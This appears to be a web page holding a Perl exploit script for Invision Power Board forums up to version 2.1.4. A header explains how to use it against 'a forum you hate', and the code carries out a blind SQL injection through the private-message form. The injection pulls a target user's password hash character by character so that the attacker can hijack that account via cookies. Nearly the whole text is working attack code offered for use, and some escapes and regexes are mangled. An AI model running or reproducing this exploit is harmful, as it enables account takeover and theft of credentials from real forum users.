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  • Words: 881
  • Pages: 5
Code: #!/usr/bin/perl ####################################################################### ###### ## IPB <=2.1.4 exploit (possibly 2.1.5 too) ## ## Brought to you by the Ykstortion security team. ## ## ## ## The bug is in the pm system so you must have a registered user. ## ## The exploit will extract a password hash from the forum's data base of ## ## the target user. ## ## You need to know the target user's member ID but it's not difficult to ## ## find out, just look under their avatar next to one of their posts. ## ## Once you have the hash, simply unset all forum cookies and set ## ## member_id to the target user's member id and pass_hash to the hash ## ## obtained from the database by this script. ## ## ## ## Usage: ## ## $ ./ipb ## ## IPB Forum URL ? ## ## Your username ? krypt_sk1dd13 ## ## Your pass ? if_your_on_nix_this_gets_hidden ## ## Target userid ? 3637 ## ## ## ## Attempting to extract password hash from database... ## ## 537ab2d5b37ac3a3632f5d06e8e04368 ## ## Hit enter to quit. ## ## ## ## Requirements: ## ## o Perl 5 ##

## o LWP 5.64 or later ## ## o Internet access ## ## o A forum you hate/dislike ## ## o A user on said forum ## ## o 32+ PMs left till your inbox is full, if not you can still delete ## ## PMs from your inbox as the successful ones come through ## ## ## ## Credit to: Nuticulus for finding the SQL injection ## ## ## ## Have fun, you dumb skiddie. ## ####################################################################### ###### use HTTP::Cookies; use LWP 5.64; use HTTP::Request; # variables my $login_page = '?act=Login&CODE=01'; my $pm_page = '?act=Msg&CODE=04'; my $pose_pm_page = '?'; my $tries = 5; my $sql = ''; my $hash = ''; my $need_null = 0; my $i; my $j; my @charset = ('0' .. '9', 'a' .. 'f'); my %form = (act => 'Msg', CODE => '04', MODE => '01', OID => '', removeattachid => '', msg_title => 'asdf', bbmode => 'normal', ffont => 0, fsize => 0, fcolor => 0, LIST => ' LIST ', helpbox => 'Insert Monotype Text (alt + p)', tagcount => 0, Post => 'jkl'); # objects my $ua = LWP::UserAgent->new; my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);

my $resp; # init the cookie jar $ua->cookie_jar ($cj); # allow redirects on post requests push @{ $ua->requests_redirectable }, "POST"; # get user input print 'IPB Forum URL ? '; chomp (my $base_url = <STDIN>); print 'Your username ? '; chomp (my $user = <STDIN>); $form{entered_name} = $user; print 'Your pass ? '; # systems without stty will error otherwise my $stty = -x '/bin/stty'; system 'stty -echo' if $stty; # to turn off echoing chomp (my $pass = <STDIN>); system 'stty echo' if $stty; # to turn it back on print "n" if $stty; print 'Target userid ? '; # it'll say next to one of their posts chomp (my $tid = <STDIN>); # parse the given base url if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url } if ($base_url !~ m#/$|index.php$#) { $base_url .= '/' } do { $resp = $ua->post ($base_url . $login_page, [ UserName => $user, PassWord => $pass, CookieDate => 1, ]); } while ($tries-- && !$resp->is_success()); # reset tries $tries = 5; # did we get 200 (OK) ? if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "n" } # was the pass right ? if ($resp->content =~ /sorry, the password was wrong/i) { die "Error: password incorrect.n"; } # get ourselves a post_key (and an auth_key too with newer versions) do { $resp = $ua->get ($base_url . $pm_page); } while ($tries-- && !$resp->is_success()); # reset tries $tries = 5; if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "n" }

if ($resp->content =~ m##) { $form{post_key} = $1; } else { die "Error: couldn't get a post key.n"; } if ($resp->content =~ m##) { $form{auth_key} = $1; } # turn off buffering so chars in the hash show up straight away $| = 1; print "nAttempting to extract password hash from database...n "; OFFSET: for ($i = 0; $i < 32; ++$i) { CHAR: for ($j = 0; $j < @charset; ++$j) { # reset tries $tries = 5; print "x08", $charset[$j]; # build sql injection $sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR(' . (join (',', map {ord} split ('', $user))) . ') FROM ' . 'ibf_members WHERE id = ' . $tid . ' AND MID(' . 'member_login_key, ' . ($i + 1) . ', 1) = CHAR(' . ord ($charset[$j]) . ')'; $form{from_contact} = $sql; $resp = $ua->post ($base_url . $post_pm_page, %form, referer => $base_url . $pm_page); if (!$resp->is_success()) { die "nError: " . $resp->status_line . "n" if (!$tries); --$tries; redo; } if ($resp->content =~ /sql error/i) { if ($need_null) { die "Error: SQL error.n"; } else { $need_null = 1; redo OFFSET; } } elsif ($resp->content !~ /there is no such member/i) { # we have a winner ! print ' '; next OFFSET; } } # uh oh, something went wrong die "nError: couldn't get a char for offset $in";

} print "x08 x08nHit enter to quit.n"; <STDIN>;

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